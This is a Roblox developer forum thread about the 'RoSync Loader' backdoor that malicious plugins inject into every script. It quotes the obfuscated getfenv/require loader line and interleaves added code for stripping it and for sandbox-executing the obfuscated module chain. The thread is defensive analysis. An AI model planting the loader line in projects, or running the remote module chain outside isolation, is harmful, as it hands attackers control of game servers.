What is RoSync?

Recently while helping my friend make his game, I noticed this line inside EVERY script:
--[[ Last synced 9/26/2020 04:22 RoSync Loader ]] getfenv()[string.reverse("\101\114\105\117\113\101\114")](5722703997) --[[ ]]--

What is this?
It definitely looks like a backdoor, but what is it exactly and how do I get rid of it?
Also, it comes back after I remove the line.

EDIT: Managed to get rid of it with RoDefender; it was named “AntiVirus”.
Had to clear out the scripts manually though :confused:

EDIT 2: This post seems to get a lot of traction, so my advice is just to watch out for plugins. All the scripts changed while in Studio, so a normal model/script can't do that. It was probably one of my friend's plugins, since this appeared only in his Team Create game. So just watch out for any suspicious plugins, and download only the official ones (check that the creator is not a group!).

78 Likes

It could very well be a backdoor; I’ve heard they require certain modules and use getfenv() and setfenv().

And they named it antivirus to hide what it does

18 Likes

@DoctorNO2106 is right, it’s a backdoor. That code is basically the same thing as require(5722703997). This could be used for numerous things, but I’m assuming it’s being used for “Server-side Exploits”.

The easiest way to fix this is to use the Find Results tool in Studio, search for 5722703997 in all Scripts, and remove that line from each Script.

Here is where the rabbit hole of require() functions leads you to: [ Content Deleted ] - Roblox, an obfuscated ModuleScript.

30 Likes
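The search-and-remove step described above, automated for the Studio command bar. This is an added example, not code from the thread or from any of the tools mentioned in it: it walks every Script, LocalScript and ModuleScript in the place, finds lines that carry either the asset id from the injected line or the `getfenv()[string.reverse(...)](<id>)` call shape (so a copy with a different id is still caught), and strips those lines. It assumes the injected loader is self-contained on one line, as it is in the post, and that you run it in Studio, where the command bar can read and write `Source`; the pattern, the `dryRun` switch and the function names are mine.

```lua
-- Added example (not from the thread): find and strip the injected loader line
-- from every script in the open place, from the Studio command bar.
-- Assumption: the loader sits on one line, as shown in the post.
local BACKDOOR_ID = "5722703997"
-- Lua pattern for the call shape: getfenv()[ ... string.reverse(...) ... ]( <digits> )
local LOADER_PATTERN = "getfenv%s*%(%s*%)%s*%[.-string%.reverse%b().-%]%s*%(%s*(%d+)%s*%)"

local function isScript(inst)
	return inst:IsA("Script") or inst:IsA("LocalScript") or inst:IsA("ModuleScript")
end

-- Returns (cleanedSource, removedLines); cleanedSource is nil when nothing matched.
local function stripLoader(source)
	local kept, removed = {}, {}
	for _, line in ipairs(string.split(source, "\n")) do
		local calledId = line:match(LOADER_PATTERN)
		if calledId or line:find(BACKDOOR_ID, 1, true) then
			table.insert(removed, line)
		else
			table.insert(kept, line)
		end
	end
	if #removed == 0 then
		return nil, removed
	end
	return table.concat(kept, "\n"), removed
end

-- dryRun = true only reports; dryRun = false rewrites Source. Returns the count.
local function cleanPlace(dryRun)
	local infected = 0
	for _, inst in ipairs(game:GetDescendants()) do
		if isScript(inst) then
			-- Source can throw for scripts you are not allowed to read; skip those.
			local ok, source = pcall(function() return inst.Source end)
			if ok then
				local cleaned, removed = stripLoader(source)
				if cleaned then
					infected = infected + 1
					print(("%s: %d loader line(s)"):format(inst:GetFullName(), #removed))
					for _, l in ipairs(removed) do
						print("   removed: " .. l:sub(1, 120))
					end
					if not dryRun then
						inst.Source = cleaned
					end
				end
			end
		end
	end
	print(("%d infected script(s)%s"):format(infected,
		dryRun and " (dry run, nothing changed)" or " cleaned"))
	return infected
end

cleanPlace(true)    -- look first
-- cleanPlace(false) -- then strip the lines for real
```

Run the dry run, read the printed list, then run the real pass; afterwards the thread's other advice still applies, because a malicious plugin (or a collaborator's) will re-inject the line into clean scripts.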

The line of code also came back when I removed it. Does this mean it’s a plugin?

4 Likes

Most likely a malicious plugin that is installed in your Studio is causing this. I would recommend installing plugins from trusted creators only.

7 Likes

I have no suspicious plugins installed; I really have no idea what caused that.

Would you mind sending a list of your plugins? Also, if the game has Team Create enabled, make sure none of your collaborators have a malicious plugin either.

2 Likes

It’s a backdoor that infects every script through plugins made by malicious people. I found this out through a friend’s game that had over 700 scripts infected by this. Thankfully they were able to fix it by reverting to an older version of the game that was made not that long ago.

https://www.roblox.com/library/5722705373/Light-Editor-Updated
This plugin is an example of one that has the backdoor, and there are most likely more of them.

12 Likes

Have you installed a plugin by a group named Creator Studio recently?

Their plugins are well known to be virus plugins. I’m attempting to tunnel their module requests and I can give you more information when possible.

Tunnelled Asset Located: [ Content Deleted ] - Roblox
The requested asset has been reported.

5 Likes

I have a few links I saved from yesterday when I was still trying to figure out the problem. Here are the links if you want them:

They are all made by the same account.

3 Likes

These accounts don’t hide their inventory; if you go there and click the latest one with a script icon, you can tunnel them much quicker.

I’m going to be dropping my magic snooper script to figure out what exactly these scripts are doing past the levels of obfuscation

2 Likes

My little Sniffer module, which I ran into a few issues with, exposes exactly what this script does, completely ignoring the obfuscation.

[image]

I’m currently trying to figure out where that http request is going.

17 Likes

Did you ever figure out where the HTTP request went? I’m experiencing this same issue in one of my games now.

3 Likes

Hey, I’m pretty interested in this stuff; would you mind showing how some of this is done? It seems ridiculous that you can use a simple module to sandbox an obfuscated script.

3 Likes

I think you could literally just do
print(getfenv()[string.reverse("\101\114\105\117\113\101\114")](5722703997)) -- string.reverse(...) yields "require", so this prints the result of require(5722703997)
for this case

2 Likes

All you have to do to find where this goes is to copy/paste the ID it’s requiring (which is in plain sight) into your browser address bar. There are no fancy tricks needed to see what this does.

Edit: He’s talking about the module script that he reached once he went down the rabbit hole of scripts. It’s obfuscated, and you need some fancy tricks to figure out what’s going on in that script.

2 Likes

Yeah, the annoying thing is that you can’t actually see what this does since it’s a module chain, and I really don’t feel like sorting through 50+ modules.

EDIT: Oh yeah, I forgot that you can obfuscate scripts, makes it even more annoying lol

1 Like

Well, there are still a few edge cases that I need to figure out. One of the scripts I managed to trace was somehow able to detect that I was modifying the global environment, probably with a length checker or something. If you’d like to talk more about trying to sandbox silently, I’m happy to.

4 Likes
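The sandboxing technique asked about a few posts up, and the environment-fingerprinting edge case mentioned just above, shown in one added example that is not the poster's Sniffer module and not code from the thread. It fetches the ModuleScript behind an asset id with `game:GetObjects`, compiles its `Source` with `loadstring`, and runs it with `setfenv` under an environment that logs every global the module touches, follows every nested `require(<id>)` recursively, and records `HttpService` calls instead of sending them, so the obfuscation is irrelevant: whatever the chain really does has to reach the outside world through these globals. The sandbox table is deliberately left empty, with every lookup routed through `__index`, so a module that counts keys or walks `next()` over its environment sees nothing unusual; that this defeats the "length checker" style of detection is my assumption, as are the function names, the `MAX_DEPTH` limit and the `fakeHttp`/`fakeGame` stand-ins. It also assumes `ServerScriptService.LoadStringEnabled` is on and that you run it in a throwaway place, because the module code does execute.

```lua
-- Added example (not from the thread): a minimal require() snooper for the
-- Studio command bar. Assumptions: LoadStringEnabled is true, the id is a
-- public ModuleScript, and the place is disposable (the code really runs).
local realEnv = getfenv()      -- genuine globals to fall back to
local log, seen = {}, {}
local MAX_DEPTH = 8
local snoop                    -- forward declaration, defined below

local function record(fmt, ...)
	local line = string.format(fmt, ...)
	table.insert(log, line)
	print("[snoop] " .. line)
end

-- Stand-in for HttpService: logs method and destination, sends nothing.
local fakeHttp = setmetatable({}, {
	__index = function(_, method)
		return function(_, ...)
			local first = ...
			local url = type(first) == "table" and tostring(first.Url) or tostring(first)
			record("HttpService:%s(%s)", tostring(method), url)
			return ""  -- pretend the request succeeded
		end
	end,
})

-- Stand-in for `game`: hands out fakeHttp for HttpService, forwards the rest.
-- (FindFirstChild("HttpService") and similar paths are not covered here.)
local fakeGame = setmetatable({}, {
	__index = function(_, key)
		if key == "HttpService" then
			return fakeHttp
		elseif key == "GetService" then
			return function(_, name)
				return name == "HttpService" and fakeHttp or game:GetService(name)
			end
		end
		return game[key]
	end,
})

-- The env table stays EMPTY; hooks live only in __index. A module that
-- fingerprints its environment by counting keys therefore sees a fresh-looking
-- env, and `require == getfenv().require` still holds since both hit the hook.
local function makeEnv(depth)
	local indent = string.rep("  ", depth)
	local hooks = {
		game = fakeGame,
		require = function(target)
			if typeof(target) == "number" then
				record("%srequire(%s)", indent, tostring(target))
				return snoop(target, depth + 1)   -- follow the chain
			end
			record("%srequire(%s)", indent, tostring(target))
			return require(target)
		end,
	}
	return setmetatable({}, {
		__index = function(_, key)
			if hooks[key] ~= nil then
				return hooks[key]
			end
			record("%sglobal %s", indent, tostring(key))
			return realEnv[key]
		end,
	})
end

function snoop(assetId, depth)
	depth = depth or 0
	if seen[assetId] then
		record("asset %s already loaded", tostring(assetId))
		return nil
	end
	seen[assetId] = true
	if depth > MAX_DEPTH then
		record("depth limit reached at asset %s", tostring(assetId))
		return nil
	end
	local ok, objects = pcall(game.GetObjects, game, "rbxassetid://" .. tostring(assetId))
	local module = ok and objects[1]
	if not module then
		record("could not fetch asset %s: %s", tostring(assetId), tostring(objects))
		return nil
	end
	if not module:IsA("ModuleScript") then
		record("asset %s is a %s, not a ModuleScript", tostring(assetId), module.ClassName)
		return nil
	end
	record("%s-- asset %s: %d bytes of source", string.rep("  ", depth), tostring(assetId), #module.Source)
	local fn, err = loadstring(module.Source)
	if not fn then
		record("asset %s failed to compile: %s", tostring(assetId), tostring(err))
		return nil
	end
	setfenv(fn, makeEnv(depth))
	local ran, result = pcall(fn)
	if not ran then
		record("asset %s raised: %s", tostring(assetId), tostring(result))
		return nil
	end
	return result
end

snoop(5722703997)  -- the id from the injected line; `log` holds the trace
```

The `global <name>` lines are noisy (every `string`, `print`, `pcall` lookup shows up), but that noise is the point: the HTTP destination and each nested asset id appear in order, which is what the thread was trying to recover from the obfuscated chain.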

This might not be true, but I think the HTTP request could be going to a Discord webhook or a similar service to have a live feed of backdoored games

4 Likes

Quick update on my situation on this:

After doing the long process of going through every script in the game, scrolling down to the line, selecting the whole line and deleting it, it’s safe to say that the issue was fixed.

This was causing multiple people’s games to crash, as it caused a memory leak. After doing this, the client memory went down to 400 (it was 1,400 originally) and players stopped getting kicked. Sometimes the long way is the hard way, but it worked. Other than that, remove your plugins that aren’t made by a trusted developer.

3 Likes